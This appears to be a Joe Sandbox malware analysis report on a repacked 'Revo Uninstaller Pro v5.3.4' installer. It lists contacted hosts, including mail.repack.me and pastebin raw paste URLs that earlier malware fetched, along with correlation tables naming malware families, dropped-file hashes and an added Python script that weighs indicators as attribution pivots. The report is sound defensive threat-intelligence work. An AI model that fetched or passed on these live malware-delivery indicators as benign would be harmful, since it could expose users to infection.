                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.revouninstallerpro.com/db/ilogs/.ruelDeleteRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://www.revouninstaller.comRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://pastebin.com/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.vsrevogroup.comRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://www.revouninstaller.com/updatepro5.xmlhttps://www.revouninstaller.com/downloads-manager/?filRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://mail.repack.me/tsjtmfdm.pkgtoRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.ietf.org/rfc/rfc3447.txtSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
Legend (share of contacted IPs):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
107.167.96.36 | na-download.opera.com | United States | 53755 | IOFLOODUS | false
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | false
194.87.189.43 | mail.repack.me | Russian Federation | 197695 | AS-REGRU | false
107.167.96.38 | unknown | United States | 53755 | IOFLOODUS | false
107.167.96.39 | na-autoupdate.opera.com | United States | 53755 | IOFLOODUS | false
107.167.110.216 | lati.lb.opera.technology | United States | 21837 | OPERASOFTWAREUS | false
107.167.96.30 | trn.lb.opera.technology | United States | 53755 | IOFLOODUS | false
107.167.125.189 | submit-trn.osp.opera.software | United States | 21837 | OPERASOFTWAREUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1571786
Start date and time: 2024-12-09 17:37:54 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 35
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Revo.Uninstaller.Pro.v5.3.4.exe
Detection: MAL
Classification: mal44.troj.evad.winEXE@44/128@9/8
EGA Information:
• Successful, ratio: 62.5%
HCA Information:
                                                                                                                                    • Successful, ratio: 96%
                                                                                                                                    • Number of executed functions: 389
                                                                                                                                    • Number of non-executed functions: 102
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 92.123.181.8, 92.123.181.96, 172.202.163.200, 23.206.229.209
                                                                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, e125010.dscd.akamaiedge.net, slscr.update.microsoft.com, v2.download3.operacdn.com.edgekey.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7516 because it is empty
                                                                                                                                    • Execution Graph export aborted for target ruplp.exe, PID 5116 because there are no executed function
                                                                                                                                    • Execution Graph export aborted for target setup.exe, PID 8092 because there are no executed function
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                    • VT rate limit hit for: Revo.Uninstaller.Pro.v5.3.4.exe
Time | Type | Description
11:39:39 | API Interceptor | 39x Sleep call for process powershell.exe modified
11:40:11 | API Interceptor | 1806x Sleep call for process RevoUninPro.exe modified
IPs: earlier samples that contacted the same IP address
Match | Associated Sample Name / URL | Detection | Threat Name
(context of the match listed as bullets under each row)
104.20.4.235 | gabe.ps1 | malicious | Unknown
• pastebin.com/raw/sA04Mwk2
104.20.4.235 | cr_asm_crypter.ps1 | malicious | Unknown
• pastebin.com/raw/sA04Mwk2
104.20.4.235 | vF20HtY4a4.exe | malicious | Unknown
• pastebin.com/raw/sA04Mwk2
104.20.4.235 | OSLdZanXNc.exe | malicious | Unknown
• pastebin.com/raw/sA04Mwk2
104.20.4.235 | gaber.ps1 | malicious | Unknown
• pastebin.com/raw/sA04Mwk2
104.20.4.235 | cr_asm_crypter.ps1 | malicious | Unknown
• pastebin.com/raw/sA04Mwk2
104.20.4.235 | sostener.vbs | malicious | Njrat
• pastebin.com/raw/V9y5Q5vv
104.20.4.235 | sostener.vbs | malicious | XWorm
• pastebin.com/raw/V9y5Q5vv
104.20.4.235 | envifa.vbs | malicious | Remcos
• pastebin.com/raw/V9y5Q5vv
104.20.4.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT
• pastebin.com/raw/NsQ5qTHr
Domains: earlier samples that contacted the same domain
Match | Associated Sample Name / URL | Detection | Threat Name
(IP the domain resolved to in the earlier analysis listed as a bullet under each row)
submit-trn.osp.opera.software | file.exe | malicious | Amadey, Mars Stealer, Stealc, Vidar
• 107.167.125.189
submit-trn.osp.opera.software | PDFViewer_46615443.msi | malicious | Unknown
• 107.167.125.189
submit-trn.osp.opera.software | SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exe | malicious | Glupteba
• 107.167.125.189
submit-trn.osp.opera.software | OperaSetup.exe | malicious | Quasar
• 107.167.125.189
submit-trn.osp.opera.software | OperaSetup.exe | malicious | Quasar
• 107.167.125.189
trn.lb.opera.technology | https://www.upload.ee/files/17435967/DeltaAirLines_t.delta.com.txt.html | malicious | Unknown
• 107.167.96.30
trn.lb.opera.technology | file.exe | malicious | Amadey, Mars Stealer, Stealc, Vidar
• 107.167.96.31
trn.lb.opera.technology | PDFViewer_46615443.msi | malicious | Unknown
• 107.167.96.30
lati.lb.opera.technology | SecuriteInfo.com.Trojan.MulDrop24.56436.17805.29816.exe | malicious | Unknown
• 107.167.110.216
lati.lb.opera.technology | SecuriteInfo.com.Trojan.MulDrop24.56436.17805.29816.exe | malicious | Unknown
• 107.167.110.211
lati.lb.opera.technology | file.exe | malicious | Amadey, Glupteba
• 107.167.110.216
lati.lb.opera.technology | file.exe | malicious | Amadey, Mars Stealer, Stealc, Vidar
• 107.167.110.211
lati.lb.opera.technology | LIRR4A0xzv.exe | malicious | Amadey, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc
• 107.167.110.216
lati.lb.opera.technology | dl7WL77rkA.exe | malicious | Glupteba, Mars Stealer, Stealc, Vidar
• 107.167.110.211
lati.lb.opera.technology | SecuriteInfo.com.Program.Unwanted.5399.28168.2681.exe | malicious | Unknown
• 107.167.110.216
lati.lb.opera.technology | PDFViewer_46615443.msi | malicious | Unknown
• 107.167.110.216
lati.lb.opera.technology | Pokemon_ Ruby Version (V1.2).exe | malicious | Unknown
• 107.167.110.211
lati.lb.opera.technology | file.exe | malicious | Stealc, Vidar
• 107.167.110.216
ASNs: earlier samples that contacted an IP in the same autonomous system
Match | Associated Sample Name / URL | Detection | Threat Name
(IP contacted in the earlier analysis listed as a bullet under each row)
AS-REGRU | cXjy5Y6dXX.exe | malicious | RHADAMANTHYS
• 193.124.205.63
AS-REGRU | SRT68.exe | malicious | FormBook
• 194.58.112.174
AS-REGRU | New Order.exe | malicious | FormBook
• 31.31.196.17
AS-REGRU | 72STaC6BmljfbIQ.exe | malicious | FormBook
• 194.58.112.174
AS-REGRU | attached invoice.exe | malicious | FormBook
• 31.31.196.17
AS-REGRU | specification and drawing.exe | malicious | FormBook, PureLog Stealer
• 194.58.112.174
AS-REGRU | Pre Alert PO TVKJEANSA00967.bat.exe | malicious | FormBook, PureLog Stealer
• 194.58.112.174
AS-REGRU | DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer
• 37.140.192.206
AS-REGRU | Fi#U015f.exe | malicious | FormBook
• 31.31.196.177
AS-REGRU | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader
• 31.31.196.177
CLOUDFLARENETUS | file.exe | malicious | Snake Keylogger
• 104.21.67.152
CLOUDFLARENETUS | https://maya-lopez.filemail.com/t/BLFGBJSQ | malicious | HTMLPhisher
• 104.17.25.14
CLOUDFLARENETUS | BPzptjK1aF.exe | malicious | LummaC Stealer
• 172.67.139.78
CLOUDFLARENETUS | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc
• 104.21.16.9
CLOUDFLARENETUS | file.exe | malicious | Snake Keylogger
• 104.21.67.152
CLOUDFLARENETUS | https://mpleho.com/wd/ | malicious | Phisher
• 104.21.56.67
CLOUDFLARENETUS | file.exe | malicious | Snake Keylogger
• 172.67.177.134
CLOUDFLARENETUS | download.ps1 | malicious | Unknown
• 104.20.22.46
CLOUDFLARENETUS | download.ps1 | malicious | Unknown
• 104.20.22.46
CLOUDFLARENETUS | Rfq_po_december_purchase_list_details_specifications_09_12_2024_0000000000.vbs | malicious | Unknown
• 172.67.197.221
IOFLOODUS | 06.exe | malicious | AgentTesla
• 107.178.108.41
IOFLOODUS | sdfg.exe | malicious | AgentTesla
• 107.178.108.41
IOFLOODUS | teste.arm.elf | malicious | Gafgyt, Mirai, Moobot, Okiru
• 184.164.88.203
IOFLOODUS | https://www.upload.ee/files/17435967/DeltaAirLines_t.delta.com.txt.html | malicious | Unknown
• 107.167.96.30
IOFLOODUS | nabarm.elf | malicious | Unknown
• 148.163.47.37
IOFLOODUS | file.exe | malicious | Unknown
• 148.163.93.46
IOFLOODUS | file.exe | malicious | MicroClip
• 148.163.93.46
IOFLOODUS | IETC-24017.exe | malicious | FormBook, PureLog Stealer
• 107.167.84.42
IOFLOODUS | file.exe | malicious | FormBook
• 107.167.84.42
IOFLOODUS | VSP469620.exe | malicious | FormBook
• 107.167.84.42
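The IP, domain and ASN correlation tables above tie this sample to earlier ones through an IP that serves pastebin.com raw pastes (per the context column), Opera-owned domains, and hosting ASNs, and the threat names on those rows span unrelated families (Njrat, Remcos, FormBook, Stealc, Snake Keylogger, Glupteba). That spread is what shared infrastructure looks like, not a common operator, so a practitioner should weigh each match before pivoting on it. The Python below is an added example, not part of the Joe Sandbox report or product: it scores each indicator by how many distinct families it has been matched against and, for a shared indicator, pulls out the context values (here the raw paste URLs) that identify a campaign far better than the IP does. The rows are transcribed from the tables on this page (a subset of the ASN rows); the Context column is read as the earlier sample's own indicator, and the scoring thresholds are this example's assumption.

```python
"""Weigh Joe Sandbox "similar sample" matches before treating them as attribution pivots.

Added example, not part of the Joe Sandbox report or product. The rows below are
transcribed from the IP, domain and ASN correlation tables on this page (a subset
of the ASN rows); the pivot-strength heuristic is this example's own assumption.
"""
from __future__ import annotations

from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Match:
    kind: str       # "ip", "domain" or "asn": what the earlier sample shares with this one
    indicator: str  # the shared IP, domain or ASN
    sample: str     # the earlier sample's name or URL
    threat: str     # Joe Sandbox threat name(s), "Unknown" when unclassified
    context: str    # the earlier sample's own indicator that produced the match (assumed reading)


# Constructed input: rows transcribed from the correlation tables on this page.
MATCHES = [
    Match("ip", "104.20.4.235", "gabe.ps1", "Unknown", "pastebin.com/raw/sA04Mwk2"),
    Match("ip", "104.20.4.235", "cr_asm_crypter.ps1", "Unknown", "pastebin.com/raw/sA04Mwk2"),
    Match("ip", "104.20.4.235", "vF20HtY4a4.exe", "Unknown", "pastebin.com/raw/sA04Mwk2"),
    Match("ip", "104.20.4.235", "OSLdZanXNc.exe", "Unknown", "pastebin.com/raw/sA04Mwk2"),
    Match("ip", "104.20.4.235", "gaber.ps1", "Unknown", "pastebin.com/raw/sA04Mwk2"),
    Match("ip", "104.20.4.235", "cr_asm_crypter.ps1", "Unknown", "pastebin.com/raw/sA04Mwk2"),
    Match("ip", "104.20.4.235", "sostener.vbs", "Njrat", "pastebin.com/raw/V9y5Q5vv"),
    Match("ip", "104.20.4.235", "sostener.vbs", "XWorm", "pastebin.com/raw/V9y5Q5vv"),
    Match("ip", "104.20.4.235", "envifa.vbs", "Remcos", "pastebin.com/raw/V9y5Q5vv"),
    Match("ip", "104.20.4.235", "New Voicemail Invoice 64746w .js", "WSHRAT", "pastebin.com/raw/NsQ5qTHr"),
    Match("domain", "submit-trn.osp.opera.software", "file.exe", "Amadey, Mars Stealer, Stealc, Vidar", "107.167.125.189"),
    Match("domain", "submit-trn.osp.opera.software", "PDFViewer_46615443.msi", "Unknown", "107.167.125.189"),
    Match("domain", "submit-trn.osp.opera.software", "SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exe", "Glupteba", "107.167.125.189"),
    Match("domain", "submit-trn.osp.opera.software", "OperaSetup.exe", "Quasar", "107.167.125.189"),
    Match("asn", "AS-REGRU", "cXjy5Y6dXX.exe", "RHADAMANTHYS", "193.124.205.63"),
    Match("asn", "AS-REGRU", "SRT68.exe", "FormBook", "194.58.112.174"),
    Match("asn", "AS-REGRU", "New Order.exe", "FormBook", "31.31.196.17"),
    Match("asn", "AS-REGRU", "DO-COSU6387686280.pdf.exe", "FormBook, PureLog Stealer", "37.140.192.206"),
    Match("asn", "CLOUDFLARENETUS", "file.exe", "Snake Keylogger", "104.21.67.152"),
    Match("asn", "CLOUDFLARENETUS", "https://maya-lopez.filemail.com/t/BLFGBJSQ", "HTMLPhisher", "104.17.25.14"),
    Match("asn", "CLOUDFLARENETUS", "BPzptjK1aF.exe", "LummaC Stealer", "172.67.139.78"),
    Match("asn", "CLOUDFLARENETUS", "https://mpleho.com/wd/", "Phisher", "104.21.56.67"),
    Match("asn", "CLOUDFLARENETUS", "download.ps1", "Unknown", "104.20.22.46"),
]


def families(threat: str) -> set[str]:
    """Split a threat cell such as 'Amadey, Stealc, Vidar' into families; 'Unknown' adds none."""
    return {t.strip() for t in threat.split(",") if t.strip() and t.strip() != "Unknown"}


def summarize(matches: list[Match]) -> dict[tuple[str, str], tuple[int, set[str]]]:
    """Per (kind, indicator): number of matched rows and the distinct families among them."""
    rows: Counter = Counter()
    fams: defaultdict = defaultdict(set)
    for m in matches:
        key = (m.kind, m.indicator)
        rows[key] += 1
        fams[key] |= families(m.threat)
    return {key: (rows[key], fams[key]) for key in rows}


def pivot_strength(kind: str, n_rows: int, n_families: int) -> str:
    """Heuristic (this example's assumption): shared infrastructure is used by unrelated
    families, so an indicator matched against three or more families is a weak pivot,
    and an ASN is always weak because it groups every tenant of a hosting provider."""
    if kind == "asn" or n_families >= 3:
        return "weak"
    if n_families <= 1 and n_rows >= 3:
        return "strong"
    return "moderate"


def assess(matches: list[Match]) -> dict[tuple[str, str], tuple[int, list[str], str]]:
    """Map each indicator to (rows, sorted families, pivot strength)."""
    return {
        key: (n, sorted(f), pivot_strength(key[0], n, len(f)))
        for key, (n, f) in summarize(matches).items()
    }


def context_pivots(matches: list[Match], kind: str, indicator: str) -> Counter:
    """For a weak (shared) indicator, count the earlier samples' own context values; for the
    paste-site IP these are the paste URLs, which identify a campaign far better than the IP."""
    return Counter(m.context for m in matches if (m.kind, m.indicator) == (kind, indicator))


if __name__ == "__main__":
    for (kind, ind), (n, fams_, strength) in assess(MATCHES).items():
        print(f"{kind:6} {ind:32} rows={n:2} families={len(fams_)} pivot={strength}")
    print(context_pivots(MATCHES, "ip", "104.20.4.235").most_common())
```

Run as written, every indicator on this page scores "weak": the pastebin IP and the Opera domain each carry four or more unrelated families, and the ASN matches are discarded by kind. The only values worth carrying into a hunt are the paste URLs that `context_pivots` surfaces, with pastebin.com/raw/sA04Mwk2 shared by six earlier samples; note that the page does not say which paste this sample itself fetched, so that pivot still has to be confirmed against its own network traffic.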
JA3 Fingerprints: earlier samples whose TLS client hello produced the same JA3 hash
Match | Associated Sample Name / URL | Detection | Threat Name
(IPs contacted with that fingerprint in the earlier analysis listed as bullets under each row)
37f463bf4616ecd445d4a1937da06e19 | http://crissertaoericardo.com.br/images/document.pif.rar | malicious | GuLoader
• 107.167.96.36
• 104.20.4.235
• 194.87.189.43
• 107.167.96.38
• 107.167.96.39
• 107.167.110.216
• 107.167.96.30
• 107.167.125.189
37f463bf4616ecd445d4a1937da06e19 | tQoSuhQIdC.msi | malicious | Unknown
• 107.167.96.36
• 104.20.4.235
• 194.87.189.43
• 107.167.96.38
• 107.167.96.39
• 107.167.110.216
• 107.167.96.30
• 107.167.125.189
37f463bf4616ecd445d4a1937da06e19 | A8Uynu9lwi.lnk | malicious | Unknown
• 107.167.96.36
• 104.20.4.235
• 194.87.189.43
• 107.167.96.38
• 107.167.96.39
• 107.167.110.216
• 107.167.96.30
• 107.167.125.189
37f463bf4616ecd445d4a1937da06e19 | MsmxWY8nj7.exe | malicious | RHADAMANTHYS
• 107.167.96.36
• 104.20.4.235
• 194.87.189.43
• 107.167.96.38
• 107.167.96.39
• 107.167.110.216
• 107.167.96.30
• 107.167.125.189
37f463bf4616ecd445d4a1937da06e19 | ZAMOWIEN.EXE.exe | malicious | AgentTesla, GuLoader
• 107.167.96.36
• 104.20.4.235
• 194.87.189.43
• 107.167.96.38
• 107.167.96.39
• 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    Lenticels.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    Request for Quotation New collaboration.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    REQUEST FOR QUOATION AND PRICES 01306-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    cllmxIZWcQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    qhjKN40R2Q.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
Dropped file matches (Match / Associated Sample Name / Detection / Threat Name):

Match: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe
• Associated Sample Name / URL: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Threat Name: Unknown
• Associated Sample Name / URL: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Threat Name: Unknown

Match: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll
• Associated Sample Name / URL: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Threat Name: Unknown
• Associated Sample Name / URL: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Threat Name: Unknown
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Non-ISO extended-ASCII text, with very long lines (793), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5590
                                                                                                                                            Entropy (8bit):5.036330960659774
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:ehs4nT03+Pq7sWchbo1Z18HOfMyLGt5aYbCMKgMbl5KTp9P3Rz3lwemW3bk:8HAEq76ubCufst5abLge5KXPJlQQk
                                                                                                                                            MD5:BB9B516486F1A5C2D5AA127355164604
                                                                                                                                            SHA1:712191F838CD5E95F5EC9A32ECD937F1B0119182
                                                                                                                                            SHA-256:0BDF49709C28EDEF8257F7FCB902314181C4FC66C8C3190EB55A30105487A9AC
                                                                                                                                            SHA-512:B29747BEDBC3B14E315FA216CE5ABEB222C354FA6A96055963666EFA3EAD39BF85DF2AB29015EFCB673503337B3BAA255D9AC396C0A503EA6F61B53198671EE8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:REVO UNINSTALLER PRO LICENSE AGREEMENT AND COPYRIGHT..========================....IMPORTANT: YOU SHOULD CAREFULLY READ THE FOLLOWING LICENSE AGREEMENT. IT WILL BE NECESSARY FOR YOU TO AGREE TO BE BOUND BY THE TERMS OF THIS AGREEMENT BEFORE BEING PERMITTED TO CONTINUE TO INSTALL THE PRODUCT.....This license Agreement is a legal agreement between You (either personal or corporate) and VS REVO GROUP, the developer of the SOFTWARE .Revo Uninstaller Pro.". "VS REVO GROUP" means the developer of the "Revo Uninstaller Pro" software product, VS Revo Group, Ltd. SOFTWARE means Revo Uninstaller Pro product and related explanatory materials. The term "SOFTWARE" also shall include any upgrades, modified versions or updates of the Software licensed to You by VS REVO GROUP.....YOU AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE AGREEMENT AND THE LIMITATIONS OF YOUR LICENSE BY INSTALLING, COPYING, DISTRIBUTING OR OTHERWISE USING the SOFTWARE. IF YOU DO NOT AGREE, DO NOT INSTALL, DISTRIBUTE OR USE REVO
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):191968
                                                                                                                                            Entropy (8bit):6.198794572117837
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:7G5lIaj6Zx5+hKTTn6115xx/Nl19oyUBlBN0AZHVf+3S484:7uSDXb67bPng1G1
                                                                                                                                            MD5:8B9964E06195FD375D126B424E236F03
                                                                                                                                            SHA1:6F1741CFEB9FB70C34857DBBA3E063C88C3C32FA
                                                                                                                                            SHA-256:BDA04B693BFDEA86A7A3B47F2E4CEAE9CD9475C4E81B0AA73B70FD244A65F70F
                                                                                                                                            SHA-512:741019523B4C5F4EF9A7952172309B2D304A84CBD98FFF99A719105CC1938157EDB1691554A21B9DCD2B523C0F1AB0D37879DEEFC3B2FA5579C0D8C76CADE483
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Browse
                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$..........y.uj*.uj*.uj*3.*.uj*3.*.uj*3.*.uj*.+i+.uj*.+o+.uj*.+n+.uj*b,o+.uj*...*.uj*...*.uj*...*.uj*.uk*&uj*.+n+.uj*.+o+.uj*.+j+.uj*.+.*.uj*.u.*.uj*.+h+.uj*Rich.uj*........PE..d....Jb.........." .....v...P.......{.......................................0......./.... .........................................pS.......T...........3...............5... ..,...0%..T...................(&..(....%...............................................text...8t.......v.................. ..`.rdata...............z..............@..@.data....!...p.......N..............@....pdata...............^..............@..@.gfids...............x..............@..@.tls.................z..............@....rsrc....3.......4...|..............@..@.reloc..,.... ......................@..B........................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PDF document, version 1.7, 77 pages
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2172747
                                                                                                                                            Entropy (8bit):7.967339088421113
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:mjdEod4PD0ZuCBbVRBJHRn/kqZebFV46kT0Tw7AKlPm+JRJ:mZEo2DU1f98qZebFV4gT+R1muJ
                                                                                                                                            MD5:7012BC3336963CBF739BDB61C2226041
                                                                                                                                            SHA1:28D5BD206674B796AD22975E0023ADAFF074E163
                                                                                                                                            SHA-256:AA262DB5124FAD214251F81DFA44C19638B785D0E21C395DFDBCB91C37C3376F
                                                                                                                                            SHA-512:004E612C761C91509320983FCEE6F5B0E58136F686874DDAD39937611E6FF76111350B5D3EBA44FE7AF49E71000695B1773AA831731CEB08EDDBE37C0B70386C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(bg) /Metadata 383 0 R/ViewerPreferences 384 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 77/Kids[ 3 0 R 20 0 R 39 0 R 47 0 R 49 0 R 50 0 R 51 0 R 53 0 R 54 0 R 57 0 R 59 0 R 61 0 R 63 0 R 64 0 R 65 0 R 66 0 R 67 0 R 69 0 R 71 0 R 73 0 R 74 0 R 76 0 R 79 0 R 81 0 R 82 0 R 83 0 R 85 0 R 86 0 R 88 0 R 90 0 R 92 0 R 94 0 R 95 0 R 97 0 R 98 0 R 99 0 R 101 0 R 102 0 R 103 0 R 105 0 R 106 0 R 108 0 R 109 0 R 110 0 R 111 0 R 112 0 R 113 0 R 114 0 R 115 0 R 116 0 R 117 0 R 118 0 R 119 0 R 120 0 R 121 0 R 122 0 R 123 0 R 125 0 R 126 0 R 127 0 R 128 0 R 129 0 R 130 0 R 131 0 R 132 0 R 134 0 R 135 0 R 136 0 R 137 0 R 322 0 R 325 0 R 329 0 R 333 0 R 335 0 R 340 0 R 345 0 R 347 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</ExtGState<</GS5 5 0 R/GS8 8 0 R>>/Font<</F1 6 0 R/F2 9 0 R/F3 11 0 R/F4 13 0 R>>/XObject<</Image18 18 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Gr
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9794808
                                                                                                                                            Entropy (8bit):6.9007098668528695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:3dq5HiSQHu3a6F3+3gqVCnNqNt2A0p/5chEuuZkJaC:3dqtNk6UbhbaC
                                                                                                                                            MD5:D94CAA2ACB6EBAB90BF564AC6BFC1F05
                                                                                                                                            SHA1:965B4E3D1CF653ABC9C68736E5240FA3B50C2C46
                                                                                                                                            SHA-256:DB8B4EB11D18FD1DB9342DFC0155069289A4B0E6A9DF69520463F1224BC51C91
                                                                                                                                            SHA-512:3B24C4351177473D2BFD1CC4488EA9A5A5AEC2BB41801E70B4ACEFCE24C221B10CD491884CD1AA353D71365798FDEE11852F96813AD4468F7BE05787F1DB0AF3
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Browse
